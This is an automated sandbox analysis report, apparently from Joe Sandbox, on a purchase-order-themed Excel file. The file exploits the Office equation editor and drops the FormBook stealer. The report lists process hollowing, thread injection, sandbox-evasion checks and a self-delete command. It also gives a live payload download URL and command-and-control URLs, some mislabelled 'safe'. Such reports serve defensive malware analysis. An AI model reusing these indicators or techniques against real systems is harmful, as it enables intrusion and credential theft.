          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: HME AG PO 2091.xlsxStatic file information: File size 1703303 > 1048576
          Source: Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
          Source: HME AG PO 2091.xlsxInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_73291000 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041E9E6 push edx; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00416B6D push ebx; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D55C push eax; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041EEB5 push esi; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022FDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D4FB push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D55C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008E9E6 push edx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00086B6D push ebx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008EEB5 push esi; ret
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\word.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000079B6E second address: 0000000000079B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2864Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2648Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.461029168.00000000005C4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.469092252.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.474172452.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.507910245.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0018E912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0018EC54 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0018EC16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0018EBD7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_0018EB26 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_009A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022E0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_022E00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\word.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040ACE0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ponto-bras.space
          Source: C:\Windows\explorer.exeDomain query: www.hydrogendatapower.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\word.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 8C0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\word.exeMemory written: C:\Users\user\AppData\Roaming\word.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\word.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\word.exeThread register set: target process: 1764
          Source: C:\Users\user\AppData\Roaming\word.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553050 Sample: HME AG PO 2091.xlsx Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 12 other signatures 2->55 10 EQNEDT32.EXE 11 2->10         started        15 EXCEL.EXE 53 12 2->15         started        process3 dnsIp4 47 rfr.lt 91.203.68.162, 49165, 80 NANO-ASLV Latvia 10->47 35 C:\Users\user\AppData\Roaming\word.exe, PE32 10->35 dropped 37 C:\Users\user\AppData\Local\...\ctf[1].exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 word.exe 19 10->17         started        39 C:\Users\user\Desktop\~$HME AG PO 2091.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\mtmmtvzho.dll, PE32 17->33 dropped 57 Multi AV Scanner detection for dropped file 17->57 59 Machine Learning detection for dropped file 17->59 61 Tries to detect virtualization through RDTSC time measurements 17->61 63 Injects a PE file into a foreign processes 17->63 21 word.exe 17->21         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 shops.myshopify.com 23.227.38.74, 49166, 80 CLOUDFLARENETUS Canada 24->41 43 www.ponto-bras.space 24->43 45 2 other IPs or domains 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 cscript.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HME AG PO 2091.xlsx43%VirustotalBrowse
          HME AG PO 2091.xlsx33%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
          HME AG PO 2091.xlsx100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\word.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe42%ReversingLabsWin32.Worm.SpyBot
          C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll33%ReversingLabsWin32.Trojan.SpyNoon
          C:\Users\user\AppData\Roaming\word.exe42%ReversingLabsWin32.Worm.SpyBot

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.word.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.word.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cscript.exe.2abf840.7.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.word.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.word.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.word.exe.430000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.word.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cscript.exe.4d22e0.0.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          rfr.lt4%VirustotalBrowse
          shops.myshopify.com1%VirustotalBrowse
          www.hydrogendatapower.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.rthearts.com/nk6l/0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://rfr.lt/ctf.exe100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.hydrogendatapower.com/nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D0%Avira URL Cloudsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.ponto-bras.space/nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          rfr.lt
          		91.203.68.162
          		truetrueunknown
          parkingpage.namecheap.com
          		198.54.117.212
          		truefalse
            		high
            shops.myshopify.com
            		23.227.38.74
            		truetrueunknown
            www.hydrogendatapower.com
            		unknown
            		unknowntrueunknown
            www.ponto-bras.space
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.rthearts.com/nk6l/true
              • Avira URL Cloud: safe
              		low
              http://rfr.lt/ctf.exetrue
              • Avira URL Cloud: malware
              		unknown
              http://www.hydrogendatapower.com/nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89Dtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.ponto-bras.space/nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89Dtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://investor.msn.comexplorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
